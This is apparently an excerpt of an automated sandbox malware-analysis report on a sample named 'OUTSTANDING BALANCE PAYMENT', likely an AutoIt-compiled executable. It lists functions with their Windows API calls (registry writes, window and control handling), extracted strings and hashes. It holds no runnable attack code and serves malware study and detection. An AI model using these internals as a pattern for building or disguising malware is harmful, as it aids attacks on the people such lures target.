                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                  • String ID: AutoIt v3 GUI
                                                                  • API String ID: 1458621304-248962490
                                                                  • Opcode ID: dbea094af3e883fb46da22d6304a800bb00d6bdcd29df65211afcd0f3525e3c0
                                                                  • Instruction ID: 724311dfa24d53816b61a1f691e6498330dece98506dfdad057d80cb9e0e2c1d
                                                                  • Opcode Fuzzy Hash: dbea094af3e883fb46da22d6304a800bb00d6bdcd29df65211afcd0f3525e3c0
                                                                  • Instruction Fuzzy Hash: 93B1BC75A1120A9FDF05DFA8CC45BAE7BB9FB08314F114229FA05AB290DB74E860CF55
                                                                  Function 002E3639 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002E3735
                                                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,0031DC00,00000000,?,00000000,?,?), ref: 002E37A3
                                                                  • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 002E37EB
                                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 002E3874
                                                                  • RegCloseKey.ADVAPI32(?), ref: 002E3B94
                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 002E3BA1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Close$ConnectCreateRegistryValue
                                                                  • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                  • API String ID: 536824911-966354055
                                                                  • Opcode ID: 6af010fe70e6c91e97ac37c7f10e5d1153670fe4e69b4b50e4029228b70186ab
                                                                  • Instruction ID: 10965b015ef9fe64405e110c8262ee0524aa969e20ce0f8baa5204d05632d54c
                                                                  • Opcode Fuzzy Hash: 6af010fe70e6c91e97ac37c7f10e5d1153670fe4e69b4b50e4029228b70186ab
                                                                  • Instruction Fuzzy Hash: 9E026C752146019FCB15EF15C895A2AB7E5FF88720F04845DF98A9B3A2CB30ED61CF81
                                                                  Function 002E6BC9 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CharUpperBuffW.USER32(?,?), ref: 002E6C56
                                                                  • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 002E6D16
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: BuffCharMessageSendUpper
                                                                  • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                  • API String ID: 3974292440-719923060
                                                                  • Opcode ID: b2e5a1b910a28553db8c97199d86b40be536902f15cbd1445642f1e1d50ce76f
                                                                  • Instruction ID: 116c4ebf51cbf9e3eb30776741b35849955dec5505765ef885423689654d9ba7
                                                                  • Opcode Fuzzy Hash: b2e5a1b910a28553db8c97199d86b40be536902f15cbd1445642f1e1d50ce76f
                                                                  • Instruction Fuzzy Hash: 61A1D0342703829FCB14EF21C895A6AB3A1BF54394F54496DB8A65B3D2DB70EC29CF41
                                                                  Function 002BCF50 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 002BCF91
                                                                  • __swprintf.LIBCMT ref: 002BD032
                                                                  • _wcscmp.LIBCMT ref: 002BD045
                                                                  • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 002BD09A
                                                                  • _wcscmp.LIBCMT ref: 002BD0D6
                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 002BD10D
                                                                  • GetDlgCtrlID.USER32(?), ref: 002BD15F
                                                                  • GetWindowRect.USER32(?,?), ref: 002BD195
                                                                  • GetParent.USER32(?), ref: 002BD1B3
                                                                  • ScreenToClient.USER32(00000000), ref: 002BD1BA
                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 002BD234
                                                                  • _wcscmp.LIBCMT ref: 002BD248
                                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 002BD26E
                                                                  • _wcscmp.LIBCMT ref: 002BD282
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                                  • String ID: %s%u
                                                                  • API String ID: 3119225716-679674701
                                                                  • Opcode ID: 32bb1018eaff62fb8e5d83cb4cb97e4c49f0a5d496381ed7bff6ae54e72949dd
                                                                  • Instruction ID: 1e467d6f7ffbfd9285ef2423769f0a493f11768f657ab2ce5ff0ef4697e97437
                                                                  • Opcode Fuzzy Hash: 32bb1018eaff62fb8e5d83cb4cb97e4c49f0a5d496381ed7bff6ae54e72949dd
                                                                  • Instruction Fuzzy Hash: 83A1EF31624747ABD715DF64C884FEAB7A8FF04394F008A1AF99992181EB30E965CB91
                                                                  Function 002BD8A7 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetClassNameW.USER32(00000008,?,00000400), ref: 002BD8EB
                                                                  • _wcscmp.LIBCMT ref: 002BD8FC
                                                                  • GetWindowTextW.USER32(00000001,?,00000400), ref: 002BD924
                                                                  • CharUpperBuffW.USER32(?,00000000), ref: 002BD941
                                                                  • _wcscmp.LIBCMT ref: 002BD95F
                                                                  • _wcsstr.LIBCMT ref: 002BD970
                                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 002BD9A8
                                                                  • _wcscmp.LIBCMT ref: 002BD9B8
                                                                  • GetWindowTextW.USER32(00000002,?,00000400), ref: 002BD9DF
                                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 002BDA28
                                                                  • _wcscmp.LIBCMT ref: 002BDA38
                                                                  • GetClassNameW.USER32(00000010,?,00000400), ref: 002BDA60
                                                                  • GetWindowRect.USER32(00000004,?), ref: 002BDAC9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                  • String ID: @$ThumbnailClass
                                                                  • API String ID: 1788623398-1539354611
                                                                  • Opcode ID: f502e5eb99e413b2084b65fc8bc40779ceed09cf886b4491b1a220a09f800505
                                                                  • Instruction ID: 212315f0a9511d7398d5afd8cf19dea3006e7120038364d270f357b5092ea8c4
                                                                  • Opcode Fuzzy Hash: f502e5eb99e413b2084b65fc8bc40779ceed09cf886b4491b1a220a09f800505
                                                                  • Instruction Fuzzy Hash: 9081C6310183069BDB05DF50C885FEA7BE8FF44798F18446AFD899A096EB30DD65CBA1
                                                                  Function 002BD6F4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: __wcsnicmp
                                                                  • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                  • API String ID: 1038674560-1810252412
                                                                  • Opcode ID: 68ef60b1821072a21e887f0e2754fd5a9d50a4626b80c9ccc04efa1b0ed32e7c
                                                                  • Instruction ID: 1eb9c56ac5706bcd4b82924e27a46cdee9d01c2b5d2cd1a754ed3dc06f3a108f
                                                                  • Opcode Fuzzy Hash: 68ef60b1821072a21e887f0e2754fd5a9d50a4626b80c9ccc04efa1b0ed32e7c
                                                                  • Instruction Fuzzy Hash: 4C31BE35A64205AADB15FE60DE93EEEB3A59F20795F300129F441B10E1FF61AE34CB11
                                                                  Function 002BEA9D Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadIconW.USER32(00000063), ref: 002BEAB0
                                                                  • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 002BEAC2
                                                                  • SetWindowTextW.USER32(?,?), ref: 002BEAD9
                                                                  • GetDlgItem.USER32(?,000003EA), ref: 002BEAEE
                                                                  • SetWindowTextW.USER32(00000000,?), ref: 002BEAF4
                                                                  • GetDlgItem.USER32(?,000003E9), ref: 002BEB04
                                                                  • SetWindowTextW.USER32(00000000,?), ref: 002BEB0A
                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 002BEB2B
                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 002BEB45
                                                                  • GetWindowRect.USER32(?,?), ref: 002BEB4E
                                                                  • SetWindowTextW.USER32(?,?), ref: 002BEBB9
                                                                  • GetDesktopWindow.USER32 ref: 002BEBBF
                                                                  • GetWindowRect.USER32(00000000), ref: 002BEBC6
                                                                  • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 002BEC12
                                                                  • GetClientRect.USER32(?,?), ref: 002BEC1F
                                                                  • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 002BEC44
                                                                  • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 002BEC6F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                  • String ID:
                                                                  • API String ID: 3869813825-0
                                                                  • Opcode ID: 8807671f77793e2b5322e5e39eabff7f353aa7a7444c304c1192d7ea108a065c
                                                                  • Instruction ID: cd741a64b6f150b50f3a222ed6695e498bffb0494a18ea755f4f7c20b05088f7
                                                                  • Opcode Fuzzy Hash: 8807671f77793e2b5322e5e39eabff7f353aa7a7444c304c1192d7ea108a065c
                                                                  • Instruction Fuzzy Hash: 58516F7190070AEFDB219FA8CD89BAEBBF9FF04744F014919E596A25A0C775A954CF00
                                                                  Function 002D79B0 Relevance: 25.6, APIs: 17, Instructions: 109COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadCursorW.USER32(00000000,00007F8A), ref: 002D79C6
                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 002D79D1
                                                                  • LoadCursorW.USER32(00000000,00007F03), ref: 002D79DC
                                                                  • LoadCursorW.USER32(00000000,00007F8B), ref: 002D79E7
                                                                  • LoadCursorW.USER32(00000000,00007F01), ref: 002D79F2
                                                                  • LoadCursorW.USER32(00000000,00007F81), ref: 002D79FD
                                                                  • LoadCursorW.USER32(00000000,00007F88), ref: 002D7A08
                                                                  • LoadCursorW.USER32(00000000,00007F80), ref: 002D7A13
                                                                  • LoadCursorW.USER32(00000000,00007F86), ref: 002D7A1E
                                                                  • LoadCursorW.USER32(00000000,00007F83), ref: 002D7A29
                                                                  • LoadCursorW.USER32(00000000,00007F85), ref: 002D7A34
                                                                  • LoadCursorW.USER32(00000000,00007F82), ref: 002D7A3F
                                                                  • LoadCursorW.USER32(00000000,00007F84), ref: 002D7A4A
                                                                  • LoadCursorW.USER32(00000000,00007F04), ref: 002D7A55
                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 002D7A60
                                                                  • LoadCursorW.USER32(00000000,00007F89), ref: 002D7A6B
                                                                  • GetCursorInfo.USER32(?), ref: 002D7A7B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Cursor$Load$Info
                                                                  • String ID:
                                                                  • API String ID: 2577412497-0
                                                                  • Opcode ID: d1e99d5b00e181e57e3997654d1e4a5c9635adbaa5e118ee54dc22f45876d359
                                                                  • Instruction ID: 25640820835c366e1e85a5e65d532ae870e4482bb6f955a940305a454fae027a
                                                                  • Opcode Fuzzy Hash: d1e99d5b00e181e57e3997654d1e4a5c9635adbaa5e118ee54dc22f45876d359
                                                                  • Instruction Fuzzy Hash: DA31E7B1D5831A6ADB509FB68C8995FBFE8FF04750F504527A50DE7280EA78A9008F91
                                                                  Function 0028C833 Relevance: 25.0, APIs: 7, Strings: 7, Instructions: 479COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0029E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,0028C8B7,?,00002000,?,?,00000000,?,0028419E,?,?,?,0031DC00), ref: 0029E984
                                                                    • Part of subcall function 0028660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,002853B1,?,?,002861FF,?,00000000,00000001,00000000), ref: 0028662F
                                                                  • __wsplitpath.LIBCMT ref: 0028C93E
                                                                    • Part of subcall function 002A1DFC: __wsplitpath_helper.LIBCMT ref: 002A1E3C
                                                                  • _wcscpy.LIBCMT ref: 0028C953
                                                                  • _wcscat.LIBCMT ref: 0028C968
                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0028C978
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0028CABE
                                                                    • Part of subcall function 0028B337: _wcscpy.LIBCMT ref: 0028B36F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                                                  • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                  • API String ID: 2258743419-1018226102
                                                                  • Opcode ID: 70682b725bbab066a1bca7f92d7a07026917d8f5cecf70706cf61d6fceb470d8
                                                                  • Instruction ID: 76cd93d6de4d42be3d6a4e591763f7692a75bf27cdaf75f61a7fadfc77656971
                                                                  • Opcode Fuzzy Hash: 70682b725bbab066a1bca7f92d7a07026917d8f5cecf70706cf61d6fceb470d8
                                                                  • Instruction Fuzzy Hash: 2212E2754283419FC724EF24C881AAFBBE4BF89354F50492EF58993291DB30DA69CF52
                                                                  Function 002ECE58 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 002ECEFB
                                                                  • DestroyWindow.USER32(?,?), ref: 002ECF73
                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 002ECFF4
                                                                  • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 002ED016
                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 002ED025
                                                                  • DestroyWindow.USER32(?), ref: 002ED042
                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00280000,00000000), ref: 002ED075
                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 002ED094
                                                                  • GetDesktopWindow.USER32 ref: 002ED0A9
                                                                  • GetWindowRect.USER32(00000000), ref: 002ED0B0
                                                                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 002ED0C2
                                                                  • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 002ED0DA
                                                                    • Part of subcall function 0029B526: GetWindowLongW.USER32(?,000000EB), ref: 0029B537
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                                  • String ID: 0$tooltips_class32
                                                                  • API String ID: 3877571568-3619404913
                                                                  • Opcode ID: 3b09ed6715f730dde2a59fb67eee987202e7f0796c1948071a3aa3c82496b065
                                                                  • Instruction ID: 500702040e1a4a8d170797206fa96b1bfe4b0eda92f09dbdbb31fafef8a37866
                                                                  • Opcode Fuzzy Hash: 3b09ed6715f730dde2a59fb67eee987202e7f0796c1948071a3aa3c82496b065
                                                                  • Instruction Fuzzy Hash: B271E1741A0345AFDB25CF28CC84F6677E9EB89704F88451DFD858B2A1DB74E852CB12
                                                                  Function 002EF351 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0029B34E: GetWindowLongW.USER32(?,000000EB), ref: 0029B35F
                                                                  • DragQueryPoint.SHELL32(?,?), ref: 002EF37A
                                                                    • Part of subcall function 002ED7DE: ClientToScreen.USER32(?,?), ref: 002ED807
                                                                    • Part of subcall function 002ED7DE: GetWindowRect.USER32(?,?), ref: 002ED87D
                                                                    • Part of subcall function 002ED7DE: PtInRect.USER32(?,?,002EED5A), ref: 002ED88D
                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 002EF3E3
                                                                  • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 002EF3EE
                                                                  • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 002EF411
                                                                  • _wcscat.LIBCMT ref: 002EF441
                                                                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 002EF458
                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 002EF471
                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 002EF488
                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 002EF4AA
                                                                  • DragFinish.SHELL32(?), ref: 002EF4B1
                                                                  • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 002EF59C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                  • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                  • API String ID: 169749273-3440237614
                                                                  • Opcode ID: 5c1115b873210f64ef07ad7893319e1c18c09a56265f9bd6d8e2a1c79a19931d
                                                                  • Instruction ID: 7c01358bda025ad03d4dd187645cbb67eb453eca7104bbdb602b729a077fd011
                                                                  • Opcode Fuzzy Hash: 5c1115b873210f64ef07ad7893319e1c18c09a56265f9bd6d8e2a1c79a19931d
                                                                  • Instruction Fuzzy Hash: 71616975109304AFC302EF60DC85D9FBBE8EF89714F400A1EF695921A1DB70EA19CB52
                                                                  Function 002CAAF8 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 374timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VariantInit.OLEAUT32(00000000), ref: 002CAB3D
                                                                  • VariantCopy.OLEAUT32(?,?), ref: 002CAB46
                                                                  • VariantClear.OLEAUT32(?), ref: 002CAB52
                                                                  • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 002CAC40
                                                                  • __swprintf.LIBCMT ref: 002CAC70
                                                                  • VarR8FromDec.OLEAUT32(?,?), ref: 002CAC9C
                                                                  • VariantInit.OLEAUT32(?), ref: 002CAD4D
                                                                  • SysFreeString.OLEAUT32(00000016), ref: 002CADDF
                                                                  • VariantClear.OLEAUT32(?), ref: 002CAE35
                                                                  • VariantClear.OLEAUT32(?), ref: 002CAE44
                                                                  • VariantInit.OLEAUT32(00000000), ref: 002CAE80
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                  • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                  • API String ID: 3730832054-3931177956
                                                                  • Opcode ID: 3fd264b1894e6a64a5e2811d84c7ad8de7ef33f8281a0b8766204e5f27dab0d3
                                                                  • Instruction ID: 1c7a72d0dde4beef9e2b390b8aceafdfaacc65a9db35b5de3e0f9d72d7a5843f
                                                                  • Opcode Fuzzy Hash: 3fd264b1894e6a64a5e2811d84c7ad8de7ef33f8281a0b8766204e5f27dab0d3
